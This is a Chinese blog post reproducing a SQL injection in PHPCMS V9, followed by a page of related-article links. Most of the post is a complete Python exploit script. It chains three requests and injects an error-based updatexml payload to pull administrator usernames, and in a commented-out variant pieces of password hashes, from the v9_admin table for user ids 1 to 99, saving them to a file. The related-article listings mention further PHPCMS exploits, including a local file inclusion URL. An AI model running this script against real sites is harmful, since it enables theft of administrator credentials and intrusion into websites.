phpcms set inc.php,phpcms V9 sql注入漏洞测试

最新推荐文章于 2024-05-17 04:59:35 发布
最新推荐文章于 2024-05-17 04:59:35 发布
阅读量500 收藏 3
点赞数
文章标签: PHPcms SQL注入 漏洞复现 Python脚本 安全性

phpcms V9 版本存在SQL注入漏洞,漏洞复现如下

0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值:

http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1

7e23e5258f9090f8a6ea7b5cb493313c.png

0x01 构造SQL语句,将0x00中的mvbpqw_siteid值代入下面链接,以POST方式发起请求

6a87f4e2d8b23a734e1e16401482c256.png

0x02 将0x01步中的json值代入下面链接中,以POST方式请求,显示敏感的报错信息

96b823fdcb69e8820d6c68a36f37eb39.png

0x03 漏洞复现完成,下面是python脚本测试

完整代码如下:

#!/usr/bin/env python

# -*- coding:utf-8 -*-

import requests

import re

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",

"Accept-Encoding": "gzip, deflate",

"Connection": "close",

"Cookie": "PHPSESSID=f0cesl88cj5ji86120ea2kpak4",

"Upgrade-Insecure-Reque": "1",

"content-Type":"application/x-www-form-urlencoded",

"Content-Length": "0"

}

def get_1_url(num):

url_1 = "http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1"

response_1 = requests.get(url_1,headers=headers)

cookie = response_1.headers["Set-Cookie"][13:]

get_2_url(cookie,num)

def get_2_url(cookie,num):

#拼接字符串,截取报错信息中的部分信息内容

# url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+" \

# "substring((password)%2c30%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))

#报错显示用户名

url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+substring" \

"((username)%2c1%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))

data = {

"userid_flash" : cookie

}

response_2 = requests.post(url_2,data=data,headers=headers)

cookie_2 = response_2.headers["Set-Cookie"][15:]

get_3_url(cookie,cookie_2)

def get_3_url(cookie,cookie_2):

url_3 = "http://127.0.0.1/index.php?m=content&c=down&a_k={}".format(cookie_2)

data = {

"userid_flash": cookie

}

response_3 = requests.post(url_3, data=data, headers=headers)

if "XPATH syntax error" in response_3.text:

hs_str = response_3.text

hs_user = re.findall(r".*Message : XPATH syntax error: '(.*?)'
",str(hs_str), re.S)[0]

with open("hs_user_add_V.txt","a+",encoding="utf-8") as f:

f.write(hs_user+"\n")

print(hs_user)

if __name__ =="__main__":

for num in range(1,100):

get_1_url(num)

0x01 测试

朱娟娟
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPCMS V9 SQL查询篇
changeriver的博客
06-01 506
添加查询条件 {php KaTeX parse error: Expected 'EOF', got '}' at position 28: …_type_int = 24"}̲ {pc:content ac…sql5" num=“1” order=“listorder asc,inputtime asc” page=“page"cache="page" cache="page"cache="cachetime” }同时调用指定栏目和指定推荐位 {pc:get sql=“SELECT * FROM v9
phpcms v9文件上传漏洞复现
qq_50646296的博客
08-21 1866
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发现它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发现图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1479
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞
最新发布
2401_85011876的博客
05-17 776
漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
php v9 sql,PHPCMS v9 SQL注入
weixin_29920697的博客
03-17 423
2013 年 2 月 4 日 by lanu文章题目:[漏洞分析]PHPCMS v9 SQL注入作 者:L.N. && n3w1yb1r7h时 间:2013-02-03声 明:此漏洞非本人首发,在此只作代码分析。漏洞分析:漏洞文件:/phpcms/modules/member/index.php[php]public functi...
PHPCMS V9爆出多个SQL注入漏洞
weixin_30653023的博客
09-13 250
phpcms 使用sys_auth函数加解密cookie信息,系统中多个文件直接从cookie中获取变量进入程序流程。 由于sys_auth函数在设计和使用过程中存在缺陷,导致注册用户可以伪造cookie数据,触发SQL注入等多个二次攻击。 看sys_auth函数代码 //libs/functions/global.func.php function sys_auth($txt, $opera...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便...
PHPCMS V9数据库配置文件database.php位置在哪
09-29
初次用PHPCMS V9的朋友可能找不到数据库配置文件,其实在官方的wiki中已经介绍了。那就是 cachesconfigsdatabase.php 文件,下面为大家介绍这个文件中相关值的具体修改方法
PHPCMS V9 修改flash上传为H5上传方案 attachments.php
03-01
PHPCMS V9 修改flash上传为H5上传方案 phpcms 上传功能文件
phpcms attachment.class.php,PHPCMS漏洞分析合集
weixin_42608318的博客
03-22 549
本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。v9.6.0任意文件上传这个漏洞存在于用户注册处。这里有一个可控变量 $_POST[‘info’] 传入了 member_input 类的 get 方法中,跟...
phpcmsv9最新利用工具
04-01
phpcmsv9最新利用工具
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
php v9 sql,phpcmsv9最新高危sql注入exp
weixin_35545345的博客
03-17 241
获取当前数据库http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost:forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&a...
PHPcms V9 任意文件上传漏洞
qax
09-04 5831
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞 一丶漏洞简介 此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。 二丶影响版本 phpcms v9.6.0 三丶漏洞分析 漏洞利用点是注册的地方,我们来看一下网上常用的一个payload: http://127.0.0.1/index.php.
基于PHPCMSSQL注入(Havij)
未名编程
07-17 1870
本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。 目录实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作实验总结 实验目的 通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用方法,了解SQL注入的危害。通过本实验,掌握SQL注入点识别方法、测试方法、自动化工具使用方法以及进行防御的基本方法。 实验环境 测试渗透机:win2k8SvrTester 工具:中国菜刀、Havij 目标服务器(靶机):phpcms网站 目标网站:http://IP:80.
阿里云ECS phpcms v9 各种注入漏洞补丁
weixin_33875839的博客
06-23 586
用阿里云ECS服务器,上传了用phpcms v9做的项目,没想到还能帮我查漏洞,于是各种百度,下面记录下百度到的答案。 1、宽字节注入漏洞 /phpcms/modules/pay/respond.php位置约16行 原来代码 $payment = $this->get_by_code($_GET['code']); 替换为 $paymen...
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
PHPCMS V9权威指南:二次开发与实战
"PHPCMS V9 产品开发权威指南" 本书是一本全面介绍PHPCMS V9的权威指南,由盛大在线平台运营中心PHPCMS项目部编写,旨在帮助用户理解和掌握这款开源的PHP内容管理系统。PHPCMS V9不仅是一个网站内容管理工具,也是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值